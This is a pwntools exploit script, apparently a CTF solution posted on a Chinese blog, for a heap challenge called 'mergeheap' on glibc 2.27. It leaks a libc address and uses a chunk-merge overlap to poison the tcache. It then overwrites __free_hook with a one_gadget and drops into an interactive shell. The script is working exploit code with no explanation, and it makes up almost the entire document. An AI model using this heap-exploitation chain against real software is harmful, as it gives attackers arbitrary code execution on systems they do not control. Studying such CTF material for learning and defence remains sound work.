1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
| from pwn import*
from LibcSearcher import *
p=process("./mergeheap")
context.log_level="debug"
context(log_level='debug',os='linux',arch='amd64')
libc=ELF('./libc-2.27.so')
def add(size,content):
p.sendlineafter('>>','1')
p.sendlineafter('len:',str(size))
p.sendlineafter('content:',content)
def show(index):
p.sendlineafter('>>','2')
p.sendlineafter('idx:',str(index))
def free(index):
p.sendlineafter('>>','3')
p.sendlineafter('idx:',str(index))
def merge(index1,index2):
p.sendlineafter('>>','4')
p.sendlineafter('idx1:',str(index1))
p.sendlineafter('idx2:',str(index2))
for i in range(8):
add(0x80,'cccc')
for i in range(1,8):
free(i)
free(0)
add(0x8,'cccccccc')
show(0)
p.recvuntil('cccccccc')
main_addr=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))
print(hex(main_addr-0x80))
main_arena=main_addr-96-0x80
malloc=main_arena-0x10
base=malloc-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
one=[0x4f2c5,0x4f322,0x10a38c]
one_gadget=base+one[1]
add(0x60,'aaaa\n')
add(0x30,'a'*0x30)
add(0x38,'a'*0x38)
add(0x100,'a')
add(0x68,'a')
add(0x20,'a')
add(0x20,'c')
add(0x20,'f')
add(0x20,'d')
free(5)
free(7)
free(8)
merge(2,3)
free(6)
payload=b'a'*0x28+p64(0x31)+p64(free_hook)+p64(0)
add(0x100,payload)
add(0x20,'aaaa')
add(0x20,'cccc')
add(0x20,p64(one_gadget))
free(9)
sleep(1)
p.interactive()
|
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~